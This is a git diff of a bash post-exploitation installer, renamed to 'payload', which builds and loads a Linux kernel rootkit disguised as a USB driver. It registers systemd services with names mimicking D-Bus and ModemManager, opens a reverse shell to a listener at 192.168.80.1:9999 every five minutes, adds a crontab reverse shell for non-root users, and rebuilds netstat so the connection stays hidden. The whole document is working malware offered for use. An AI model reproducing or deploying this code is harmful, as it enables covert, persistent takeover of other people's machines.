Update and rename phantom to payload

diff --git a/payload b/payload
--- a/payload
+++ b/payload
@@ -24,8 +24,24 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
+'
 
-The following are for the rootkit code which is mostly taken from: https://github.com/m0nad/Diamorphine
+ip="192.168.80.1"
+port="9999"
+
+#---functions and variables---
+#--rootkit--
+#makefile
+diamorphine_makefile=$(cat << \EOF
+obj-m := usb-bus.o
+KERNEL_DIR = /lib/modules/$(shell uname -r)/build
+PWD = $(shell pwd)
+all:
+	make -C $(KERNEL_DIR) SUBDIRS=$(PWD) modules
+EOF
+)
+
+: 'The following notice is for the rootkit:
 
 Copyright (c) 2014, Victor N. Ramos Mello
 All rights reserved.
@@ -52,21 +68,7 @@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 '
 
-ip="127.0.0.1/9999" #change this according to the listening ip and port
-#change also the ip and port in the _hiding variable (use search and AAA to find it in the document)
-#and the ip:port that netstat is gonna hide (use search and QQQ to find it in the document)
-
-#the makefile for the usb-bus rootkit module
-diamorphine_makefile=$(cat << \EOF
-obj-m := usb-bus.o
-KERNEL_DIR = /lib/modules/$(shell uname -r)/build
-PWD = $(shell pwd)
-all:
-	make -C $(KERNEL_DIR) SUBDIRS=$(PWD) modules
-EOF
-)
-
-#that's the code for the usb-bus rootkit module
+#rootkit
 diamorphine=$(cat << \EOF
 #include <linux/sched.h>
 #include <linux/module.h>
@@ -428,6 +430,88 @@ MODULE_DESCRIPTION("LKM rootkit");
 EOF
 )
 
+#--functions--
+#install prerequisite programs
+install_pre () {
+  which $1 &>/dev/null
+  if [ "$?" != "0" ]; then
+    printf "installing $1... "
+    apt-get install -y $1 &>/dev/null
+    if [ "$?" == "0" ]; then
+      echo "done"
+    else
+      dnf install -y $1 &>/dev/null
+      if [ "$?" == "0" ]; then
+        echo "done"
+      else
+        echo "failed"
+      fi
+    fi
+  else
+    return 1
+  fi
+}
+
+#remove prerequisite programs
+remove_pre () {
+  printf "removing $1... "
+  apt-get purge -y $1 &>/dev/null
+  if [ "$?" == "0" ]; then
+    echo "done"
+  else
+    dnf remove -y $1 &>/dev/null
+    if [ "$?" == "0" ]; then
+      echo "done"
+    else
+      echo "failed"
+    fi
+  fi
+}
+
+#the script that the systemd service is gonna use
+create_script () {
+  printf "creating the $2 script... "
+  printf "$1" >$2
+  chmod 777 $2
+  if [ "$?" == "0" ]; then
+    echo "done"
+  else
+    echo "failed"
+  fi
+}
+
+#create the systemd service
+create_service () {
+  printf "$1" >/etc/systemd/system/$2
+  systemctl daemon-reload
+  printf "enabling $2... "
+  systemctl enable $2 &>/dev/null
+  if [ "$?" == "0" ]; then
+    echo "done"
+  else
+    echo "failed"
+  fi
+  printf "starting $2... "
+  systemctl stop $2 &>/dev/null
+  systemctl start $2 &>/dev/null
+  if [ "$?" == "0" ]; then
+    echo "done"
+  else
+    echo "failed"
+  fi
+}
+
+#finish message
+finish () {
+  if [ "$?" == "0" ]; then
+    echo "done"
+  else
+    echo "failed"
+  fi
+}
+
+#--services--
+#--1st systemd service--
 #that's the script that is gonna insert the usb-bus rootkit module at boot, hide the systemd services and the bash processes
 hiding_script=$(cat << \EOF
 #!/bin/bash
@@ -453,8 +537,7 @@ while read hide_pid; do
 done <<<$bash_pid
 
 #hide bash shells which our systemd service spawns
-inode_list=$(cat /proc/net/tcp | awk '{ if($3 ~ /0100007F:270F/) print $10 }') #(AAA) change 0100007F:270F according to the listening ip and port (use ip to hex converter from the internet, revert the
-#resulting hex and use it (without the 0x) in place of 0100007F, then convert the port from decimal to hex and use it in place of 270F)
+inode_list=$(cat /proc/net/tcp | awk '{ if($3 ~ /0150A8C0:270F/) print $10 }')
 for (( i=1; i <= 65553; i=i+1 )); do
 	if [ "${hidden_pids[i]}" != "" ]; then
 		#echo "$i already on hidden_pids"
@@ -478,19 +561,6 @@ done
 EOF
 )
 
-#that's the script that's gonna open the bash connections
-bash_script=$(cat << EOF
-#!/bin/bash
-
-while true; do
-
-bash &>/dev/tcp/$ip 0>&1 &
-sleep 300
-
-done
-EOF
-)
-
 #that's the systemd service that's gonna do the hiding
 hiding_service=$(cat << \EOF
 [Unit]
@@ -505,6 +575,20 @@ User=root
 
 [Install]
 WantedBy=multi-user.target
+EOF
+)
+
+#--2nd systemd service--
+#that's the script that's gonna open the bash connections
+bash_script=$(cat << EOF
+#!/bin/bash
+
+while true; do
+
+bash &>/dev/tcp/$ip/$port 0>&1 &
+sleep 300
+
+done
 EOF
 )
 
@@ -525,6 +609,8 @@ WantedBy=multi-user.target
 EOF
 )
 
+#--variables--
+#kernel makefile
 kernel_makefile=$(cat << \EOF
 diff --git a/Makefile b/Makefile
 index dda982c..f96b174 100644
@@ -546,6 +632,7 @@ index dda982c..f96b174 100644
 EOF
 )
 
+#net-tools patch
 net_tools_patch=$(cat << \EOF
 diff --git a/iptunnel.c b/iptunnel.c
 index 4943d83..acfcbc7 100644
@@ -579,11 +666,7 @@ if [ "$USER" != "root" ]; then
   printf "adding crontab for $USER... "
 	printf "* * * * * bash -c 'bash &>/dev/tcp/$ip 0>&1 &'\n" > /tmp/.cron
 	crontab /tmp/.cron
-  if [ "$?" == "0" ]; then
-    echo "done"
-  else
-    echo "failed"
-  fi
+  finish
 	rm /tmp/.cron
 	#exit to tell ncat that we are done with the script so the connection closes
 	exit
@@ -600,74 +683,30 @@ if [ "$USER" == "root" ]; then
 	#	fi
 	#done
 
-	#---create the systemd scripts and services---
-	#create the script that the systemd service is gonna use
-  create_script () {
-    printf "creating the $2 script... "
-  	printf "$1" >$2
-  	chmod 777 $2
-    if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
-  }
-	#create the systemd service
-  create_service () {
-  	printf "$1" >/etc/systemd/system/$2
-    printf "enabling $2... "
-  	systemctl enable $2 &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
-    printf "starting $2... "
-  	systemctl restart $2 &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
-  }
-  echo "---create the systemd scripts and services---"
+	#--create the systemd scripts and services--
+  echo "--create the systemd scripts and services--"
   mkdir /var/lib/usb-bus 2>/dev/null
   create_script "$hiding_script" "/var/lib/usb-bus/usb-bus"
   mkdir /usr/local/share/d-bus 2>/dev/null
   create_script "$bash_script" "/usr/local/share/d-bus/d-bus"
-  create_service "$hiding_service" "bus-org.freedesktop.Modem.service"
-  create_service "$bash_service" "bus-org.freedesktop.ModemManager11.service"
+  create_service "$hiding_service" "dbus-org.freedesktop.Modem.service"
+  create_service "$bash_service" "dbus-org.freedesktop.ModemManager11.service"
 
-  #---install prerequisites---
-  install_pre () {
-    which $1 &>/dev/null
-    if [ "$?" != "0" ]; then
-      printf "install $1... "
-      $2=$1
-      apt-get install -y $1 &>/dev/null
-      if [ "$?" == "0" ]; then
-        echo "done"
-      else
-        dnf install -y $1 &>/dev/null
-        if [ "$?" == "0" ]; then
-          echo "done"
-        else
-          echo "failed"
-        fi
-      fi
+  #--install prerequisite programs--
+  echo "--install prerequisite programs--"
+  programs=(make gcc wget yes unzip patch kmod)
+  uninstall=()
+  for ((i=0; i < ${#programs[@]}; i++)); do
+    install_pre ${programs[$i]}
+    if [ "$?" == "0" ]; then
+      uninstall[$i]=${programs[$i]}
+    else
+      uninstall[$i]=0
     fi
-  }
-  echo "---install prerequisites---"
-  install_pre "make" "ma"
-  install_pre "gcc" "gc"
-  install_pre "wget" "wg"
-  install_pre "yes" "ye"
-  install_pre "unzip" "un"
-  install_pre "patch" "pa"
-  install_pre "kmod" "km"
+  done
 
-	#---make and insert the usb-bus rootkit module---
-  echo "---install the rootkit---"
+	#--make and insert the usb-bus rootkit module--
+  echo "--install the rootkit--"
 	#make the usb-bus rootkit module
 	if [ ! -d "/lib/modules/$(uname -r)/kernel/drivers/usb-bus" ]; then
 		mkdir /lib/modules/$(uname -r)/kernel/drivers/usb-bus
@@ -710,20 +749,12 @@ if [ "$USER" == "root" ]; then
 		printf "$kernel_makefile" >/$location/mkfile.patch
     printf "patch the makefile... "
 		patch -b -d /$location </$location/mkfile.patch &>/dev/null
-		if [ "$?" == "0" ]; then
-			echo "done"
-		else
-			echo "failed"
-		fi
+    finish
 		rm /$location/mkfile.patch
     #make the usb-bus module
 		printf "make the usb-bus rootkit module... "
 		make -C /lib/modules/$(uname -r)/kernel/drivers/usb-bus &>/dev/null
-		if [ "$?" == "0" ]; then
-			echo "done"
-		else
-			echo "failed"
-		fi
+    finish
 		rm /$location/Makefile
 		mv /$location/Makefile.* /$location/Makefile
 	fi
@@ -742,11 +773,7 @@ if [ "$USER" == "root" ]; then
   #insert the usb-bus module
   printf "inserting the usb-bus module... "
 	insmod /lib/modules/$(uname -r)/kernel/drivers/usb-bus/usb-bus.ko &>/dev/null
-	if [ "$?" == "0" ]; then
-		echo "done"
-	else
-		echo "failed"
-	fi
+  finish
 
 	#---replace netstat---
   which netstat &>/dev/null
@@ -757,54 +784,30 @@ if [ "$USER" == "root" ]; then
     #download net-tools.zip
   	printf "download net-tools.zip... "
   	wget -O /tmp/net-tools.zip https://github.com/ecki/net-tools/archive/master.zip &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
     #unzip net-tools.zip
     printf "unzipping net-tools.zip... "
   	unzip -d /tmp /tmp/net-tools.zip >/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
   	rm /tmp/net-tools.zip
-   	#modify netstat.c (change ip:port in the first sed command) (QQQ)
+   	#modify netstat.c
     printf "modifying netstat.c... "
-  	sed -i 's/printf("%-4s\s\s%6ld\s%6ld\s%-\*s/if ( strstr(rem_addr, "127.0.0.1:9999") == 0 ) {\n\t\tprintf("%-4s  %6ld %6ld %-*s/' /tmp/net-tools-master/netstat.c
+  	sed -i "s/printf(\"%-4s\s\s%6ld\s%6ld\s%-\*s/if ( strstr(rem_addr, \"$ip:$port\") == 0 ) {\n\t\tprintf(\"%-4s  %6ld %6ld %-*s/" /tmp/net-tools-master/netstat.c
   	sed -i '0,/finish_this_one(uid,inode,timers);/{s/finish_this_one(uid,inode,timers);/\tfinish_this_one(uid,inode,timers);\n\t}/};' /tmp/net-tools-master/netstat.c
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
     #patch the makefile
     printf "patching the net-tools makefile... "
   	printf "$net_tools_patch" >/tmp/net-tools-master/net.patch
   	patch -d /tmp/net-tools-master/ </tmp/net-tools-master/net.patch &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
     #make config net-tools-master
     printf "make config net-tools-master... "
   	yes "" 2>/dev/null | make -C /tmp/net-tools-master config &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
     #make net-tools-master
     printf "make net-tools-master... "
   	make -C /tmp/net-tools-master &>/dev/null
-  	if [ "$?" == "0" ]; then
-  		echo "done"
-  	else
-  		echo "failed"
-  	fi
+    finish
     #make update net-tools-master, so netstat gets replaced
     printf "make update net-tools-master... "
   	make update -C /tmp/net-tools-master &>/dev/null
@@ -816,31 +819,13 @@ if [ "$USER" == "root" ]; then
   	rm  -r /tmp/net-tools-master
   fi
 
-	#---remove prerequisites---
-  remove_pre () {
-    if [ "$1" == "$2" ]; then
-      printf "removing $2... "
-      apt-get purge -y $2 &>/dev/null
-      if [ "$?" == "0" ]; then
-        echo "done"
-      else
-        dnf remove -y $2 &>/dev/null
-        if [ "$?" == "0" ]; then
-          echo "done"
-        else
-          echo "failed"
-        fi
-      fi
+	#--remove prerequisite programs--
+  echo "--remove prerequisite programs--"
+  for ((i=0; i < ${#uninstall[@]}; i++)); do
+    if [ "${uninstall[i]}" != "0" ]; then
+      remove_pre ${uninstall[i]}
     fi
-  }
-  echo "---remove prerequisites---"
-  remove_pre "$ma" "make"
-  remove_pre "$gc" "gcc"
-  remove_pre "$ye" "yes"
-  remove_pre "$wg" "wget"
-  remove_pre "$un" "unzip"
-  remove_pre "$pa" "patch"
-  remove_pre "$km" "kmod"
+  done
 
 	#exit to tell ncat that we are done with the script so the connection closes
 	exit
